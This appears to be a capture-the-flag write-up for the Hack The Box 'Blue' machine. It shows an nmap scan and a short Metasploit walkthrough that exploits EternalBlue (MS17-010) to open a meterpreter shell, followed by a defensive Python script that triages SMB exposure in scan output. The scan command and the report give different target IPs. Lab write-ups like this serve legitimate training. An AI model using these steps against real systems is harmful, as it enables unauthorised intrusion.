HTB Blue Writeup


Description / TL;DR

This is one of the easiest boxes on HTB, with a 2-minute root. To root it, you exploit EternalBlue (MS17-010) and get a root shell.

IP: 10.10.10.50

Basic Enumeration


Nmap - we start off by running nmap -sV -sC 10.10.10.50

Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-30 23:23 ADT
Nmap scan report for 10.10.10.40
Host is up (0.052s latency).
Not shown: 992 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -31m39s, deviation: 34m36s, median: -11m41s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-07-01T03:13:13+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-06-30 23:13:11
|_  start_date: 2019-06-30 22:15:48

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.82 seconds

USER FLAG


Nope, we skip this and go straight to root.

ROOT FLAG


From our nmap scan we notice that the server is running a version of SMB that is vulnerable to EternalBlue, so we open up Metasploit (msfconsole) and run search EternalBlue. We then use that exploit, set RHOST to the box’s IP (set RHOST 10.10.10.50) and LHOST to our IP (set LHOST (yourip)), and type exploit. We then get a meterpreter shell in which we can type bash, navigate to the Admin’s desktop and get root.txt.
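The same scan read from the defender's side, as an added example that is not part of the original writeup: a small Python triage that flags the SMB exposure indicators visible in the nmap output above. The check names, remediation strings and the LEGACY_OS list are assumptions made for illustration, and the sample scan is trimmed from the output on this page.

```python
import re

# Constructed sample: trimmed from the nmap output shown in this writeup.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.40
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| smb-security-mode: 
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
"""

# Assumption: OS banners treated as legacy for triage; adjust to your estate.
LEGACY_OS = re.compile(r"Windows (XP|Vista|7|Server 2003|Server 2008)", re.I)

# (finding name, pattern in nmap normal output, suggested action) - all hypothetical names.
CHECKS = [
    ("smb-exposed", re.compile(r"^445/tcp\s+open\b", re.M),
     "restrict TCP 445 to hosts that need file sharing"),
    ("smb-signing-disabled", re.compile(r"message_signing: disabled"),
     "enable and require SMB signing; disable SMBv1 if unused"),
    ("smb2-signing-optional", re.compile(r"Message signing enabled but not required"),
     "require SMB2 signing via policy"),
    ("guest-session", re.compile(r"account_used: guest"),
     "disable guest access to SMB"),
    ("legacy-os", LEGACY_OS,
     "confirm the MS17-010 security update is installed or retire the host"),
]

def triage(scan_text):
    """Return {host: [(finding, action), ...]} for every host section in the scan."""
    report = {}
    # Each host section starts with 'Nmap scan report for <addr>'.
    for block in re.split(r"(?m)^(?=Nmap scan report for )", scan_text):
        m = re.match(r"Nmap scan report for (\S+)", block)
        if m:  # skip the preamble before the first host
            report[m.group(1)] = [(n, act) for n, rx, act in CHECKS if rx.search(block)]
    return report

if __name__ == "__main__":
    for host, findings in triage(SAMPLE_SCAN).items():
        for name, action in findings:
            print(f"{host}: {name} -> {action}")
```

These banner-level findings only prioritise hosts for follow-up; patch state still has to be confirmed on the host itself.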

This post is licensed under CC BY 4.0 by the author.